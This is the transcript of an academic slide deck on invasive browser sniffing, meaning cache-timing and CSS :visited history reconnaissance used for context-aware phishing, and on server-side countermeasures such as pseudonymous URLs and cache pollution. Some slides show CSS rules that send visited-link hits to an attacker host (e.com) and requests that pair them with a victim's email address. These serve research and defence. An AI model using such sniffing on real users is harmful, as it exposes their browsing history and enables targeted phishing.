Presentation is loading. Please wait.

Presentation is loading. Please wait.

Invasive Browser Sniffing and Countermeasures Markus Jakobsson & Sid Stamm.

Published byCharla Nash Modified over 9 years ago

Similar presentations

Presentation on theme: "Invasive Browser Sniffing and Countermeasures Markus Jakobsson & Sid Stamm."— Presentation transcript:

1 Invasive Browser Sniffing and Countermeasures Markus Jakobsson & Sid Stamm

2 The Scenario Grandma goes to evil site Gets sniffed Gets phishing email Loses money

3 Summary Example phishing attacks Context-aware phishing attacks Browser-recon attack Other Solutions Our Solution

4

5

6 Context Aware Attacks Data about targets obtained Used to customize emails Yields higher vulnerability rate

7 Context: Social Networks Mine site for relationships (Alice knows Bob) Spoof email from victim’s friend People trust their friends (and that which spoofs them)

8 Context: Browser-Recon Phisher mines browsers –Browsing history –Cached data Attacker can discover affiliations Easy to pair browser history with email address

9 Context: Cache Recon GET /index.html GET /pics/pic1.jpg GET /pics/pic2.jpg … Pic1.jpg is Not in Cache (pic1.jpg is not cached)

10 Context: Cache Recon GET /index.html … Pic1.jpg IS in Cache (pic1.jpg is cached)

11 Context: Cache Recon Phishing page forces 3 sequential loads: –Img1 on phisher’s server –Img2 on site in question (e.g. Bank) –Img3 on phisher’s server Load Time ~ Time(Img3) - Time(Img1) Short load time = cache hit (Felten & Schneider, “Timing Attacks on Web Privacy” 7th ACM Conference in Computer & Communication Security, 2000.)

12 Context: Cache Recon GET pic1.jpg GET pic2.jpg GET logout.jpg (Felten & Schneider, “Timing Attacks on Web Privacy” 7th ACM Conference in Computer & Communication Security, 2000.)

13 Context: History Recon Link 1 Link 2 Link 3 a { color: blue; } #id1:visited { color: red; } #id2:visited { color: red; } #id3:visited { color: red; } Link 1 Link 2 Link 3 What You See:The Code:

14 Context: History Recon Link 1 Link 3 a { color: blue; } #id1:visited { background: url(‘e.com/?id=1’); } #id2:visited { background: url(‘e.com/?id=2’); } … Link 1 Link 2 Link 3 What You See:The Code: Link 2

15 Context: History Recon a { color: blue; } #id1:visited { background: url(‘e.com/?id=1’); } #id2:visited { background: url(‘e.com/?id=2’); } … What You See:The Code:

16 History Recon + Email GET /?IAM=alice@x.com (lots of links) GET /hit?id=1&IAM=alice@x.com GET /hit?id=42&IAM=alice@x.com Phisher can now associate Alice with link 1 and 42 Auto-Fill Identity Extraction

17 “Chameleon” Attack

18 Solutions to Browser-recon Client-Side Solutions: –Jackson, Bortz, Boneh Mitchell, “Protecting browser state from web privacy attacks”, To appear in WWW06, 2006. –CSS limiting –“User-Paranoia” (regularly clear history, cache, keep no bookmarks) Server-Side Solution: –Make URLs impossible to guess

19 Solution Goals Requirements 1.Hard to guess any pages or resources served by SP 2.Search engines can still index and search SP

20 Formal Goal Specification

21

22 Solution Techniques Two techniques: 1.Customize URLs with pseudonyms http://chase.com/page.html?39fc938f 2.Pollute Client State (fill cache/history with related sites not visited by client) Hiding vs. obfuscating Internal (protected) URLs hidden Entry point (public) URLs obfuscated

23 Solution to Browser-recon S C GET /

24 Solution to Browser-recon SBSB C STST GET /?13fc021bGET / T Domain of S

25 Pseudonyms Establishing a pseudonym Using a pseudonym Pseudonym validity check –Via Cookies –Via HTTP-REFERER –Via Message Authentication Codes

26 Pseudonyms Robot Policies –Dealing with search engines –Robots.txt “standard” (no problem if cheating) Pollution Policy –Pollute entrance URLs –How to choose pollutants? What about links to offsite data? Bookmarks?

27 Example Bank.com C 10.0.0.1 GET /page.html?83fa029GET /page.html

28 Example Go to G Log in Bank.com C 10.0.0.1 hm

29 Example Go to G Log in Bank.com C 10.0.0.1 hm

30 Example Go to G Log in Bank.com C 10.0.0.1 hm

31 Example Go to G Log in Bank.com C 10.0.0.1 hm

32 Example Go to G Log in Bank.com C 10.0.0.1 T

33 Client’s Perception

34 Policies Offsite Redirection Policy Data Replacement Policy Client vs. Robot Distinction

35 Special Cases Cache pollution reciprocity Shared/Transfer Pseudonyms

36 Security Argument Perfect privacy of internal pages N-privacy of entrance pages Searchability

37 Prototype Details Java App simulating an HTTP server Pseudonyms: 64-bit random number –java.security.SecureRandom Experimental Client: –Shell script + CURL SBSB STST

38 Experimental Results

39

40

41

42 General Considerations Forwarding user-agent Translate Cookies Optimizations

43 Invasive Browser Sniffing and Countermeasures Markus Jakobsson & Sid Stamm ?

Download ppt "Invasive Browser Sniffing and Countermeasures Markus Jakobsson & Sid Stamm."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.

Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.
Online Privacy A Module of the CYC Course – Personal Security 8-9-10.

Online Privacy A Module of the CYC Course – Personal Security
ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.

ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.
Testing Web Applications. Applications Architecture Client Server Architecture.

Testing Web Applications. Applications Architecture Client Server Architecture.
Copyright © 2004 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
Social Phishing Tom N. Jagatic Nathaniel A. Johnson Markus Jakobsson Filippo Menczer Presenter: Ieng-Fat Lam Date: 2007/4/1.

Social Phishing Tom N. Jagatic Nathaniel A. Johnson Markus Jakobsson Filippo Menczer Presenter: Ieng-Fat Lam Date: 2007/4/1.
 Guarantee that EK is safe  Yes because it is stored in and used by hw only  No because it can be obtained if someone has physical access but this can.

 Guarantee that EK is safe  Yes because it is stored in and used by hw only  No because it can be obtained if someone has physical access but this can.
CMSC 414 Computer (and Network) Security Lecture 16 Jonathan Katz.

CMSC 414 Computer (and Network) Security Lecture 16 Jonathan Katz.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
Context-Aware Phishing Attacks and Client-Side Defenses Collin Jackson Stanford University.

Context-Aware Phishing Attacks and Client-Side Defenses Collin Jackson Stanford University.
Phishing – Read Behind The Lines Veljko Pejović

Phishing – Read Behind The Lines Veljko Pejović
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.

ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
1 Invasive Browser Sniffing and Countermeasures Aditya Sinha Harshvardhan Kelkar.

1 Invasive Browser Sniffing and Countermeasures Aditya Sinha Harshvardhan Kelkar.
Web Proxy Server Anagh Pathak Jesus Cervantes Henry Tjhen Luis Luna.

Web Proxy Server Anagh Pathak Jesus Cervantes Henry Tjhen Luis Luna.
The OWASP Foundation OWASP Chennai 2007 Phishing.

The OWASP Foundation OWASP Chennai Phishing.
Cookies COEN 351 E-commerce Security. Client / Session Identification HTTP does not maintain state. State Information can be passed using: HTTP Headers.

Cookies COEN 351 E-commerce Security. Client / Session Identification HTTP does not maintain state. State Information can be passed using: HTTP Headers.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 

Similar presentations

Ads by Google